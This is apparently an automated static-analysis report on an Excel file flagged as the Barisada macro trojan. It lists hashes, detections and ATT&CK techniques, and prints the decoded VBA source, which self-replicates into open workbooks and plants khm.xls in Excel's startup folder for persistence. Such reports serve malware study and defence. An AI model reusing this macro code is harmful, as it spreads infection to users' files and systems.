Barisada — Office (OLE) malware analysis

Static analysis result for SHA-256 2733c88ee12ef56e…

MALICIOUS

Office (OLE)

30.0 KB Created: 2001-07-02 13:02:33 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 1586ef2adcbb6b8c97ab4c0a898b2bf6 SHA-1: a36b972b11547887adf098e83c8830e248dc7f1e SHA-256: 2733c88ee12ef56ee6336705e85cd05fde63bc1a188b65469266ab9bb0cba873
140 Risk Score

Malware Insights

Barisada · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The file is detected as the Barisada trojan family by ClamAV. The VBA macro attempts to establish persistence by creating a file named 'khm.xls' in the application's startup path and injecting its code into it. This suggests the malware aims to survive reboots and maintain its presence on the system.

Heuristics 2

  • ClamAV: Xls.Trojan.Barisada-8 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Barisada-8
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7074 bytes
SHA-256: e3740fafed391648d898e35d9ffe0bd84ad3410d073a3d194daa1c6ac2c85912
Detection
ClamAV: Xls.Trojan.Barisada-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True




Private Sub Workbook_SheetCalculate(ByVal Sh As Object)

End Sub

Private Sub Workbook_SheetDeactivate(ByVal Sh As Object)

End Sub

Private Sub Workbook_WindowActivate(ByVal Wn As Window)

End Sub

Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)

flag = False
 
'xlstartÆú´õ(StartupPath)¿¡ "khm.xls"°¡ ¾øÀ¸¸é »õ·Î ¸¸µç´Ù.
 myile = Dir(Application.StartupPath & "\khm.xls")
 If myfile <> "khm.xls" Then
   Application.ScreenUpdating = False
   Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\khm.xls", FileFormat:=xlNormal, addtomru:=False
 End If
 
'ThisWorkbook Component¿¡ Äڵ尡 ÀÖÀ¸¸é vcodeº¯¼ö¿¡ Äڵ带 ÀúÀå
For i = 1 To Workbooks.Count
  eline = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines
  If eline <> o Then vcode = Workbooks(i).VBProject.VBComponents.Item("thisworkbook").CodeModule.Lines(1, eline)
  
'Äڵ尡 ¾ø´Â Component¸¦ ã¾Æ¼­ vcodeº¯¼ö°ªÀ» ÀÔ·Â
 For j = 1 To Workbooks(i).VBProject.VBComponents.Count
  vcount = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines
  If vcount = 0 Then Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.AddFromString (vcode)
 Next j: Next i
  
  
 If myfile <> "khm.xls" Then Workbooks("khm.xls").Close savechanges:=True
 
End Sub























































Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True




Private Sub Workbook_SheetCalculate(ByVal Sh As Object)

End Sub

Private Sub Workbook_SheetDeactivate(ByVal Sh As Object)

End Sub

Private Sub Workbook_WindowActivate(ByVal Wn As Window)

End Sub

Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)

flag = False
 
'xlstartÆú´õ(StartupPath)¿¡ "khm.xls"°¡ ¾øÀ¸¸é »õ·Î ¸¸µç´Ù.
 myile = Dir(Application.StartupPath & "\khm.xls")
 If myfile <> "khm.xls" Then
   Application.ScreenUpdating = False
   Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\khm.xls", FileFormat:=xlNormal, addtomru:=False
 End If
 
'ThisWorkbook Component¿¡ Äڵ尡 ÀÖÀ¸¸é vcodeº¯¼ö¿¡ Äڵ带 ÀúÀå
For i = 1 To Workbooks.Count
  eline = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines
  If eline <> o Then vcode = Workbooks(i).VBProject.VBComponents.Item("thisworkbook").CodeModule.Lines(1, eline)
  
'Äڵ尡 ¾ø´Â Component¸¦ ã¾Æ¼­ vcodeº¯¼ö°ªÀ» ÀÔ·Â
 For j = 1 To Workbooks(i).VBProject.VBComponents.Count
  vcount = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines
  If vcount = 0 Then Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.AddFromString (vcode)
 Next j: Next i
  
  
 If myfile <> "khm.xls" Then Workbooks("khm.xls").Close savechanges:=True
 
End Sub























































Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True




Private Sub Workbook_SheetCalculate(ByVal Sh As Object)

End Sub

Private Sub Workbook_SheetDeactivate(ByVal Sh As Object)

End Sub

Private Sub Workbook_WindowActivate(ByVal Wn As Window)

End Sub

Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)

flag = False
 
'xlstartÆú´õ(StartupPath)¿¡ "khm.xls"°¡ ¾øÀ¸¸é »õ·Î ¸¸µç´Ù.
 myile = Dir(Application.StartupPath & "\khm.xls")
 If myfile <> "khm.xls" Then
   Application.Sc
... (truncated)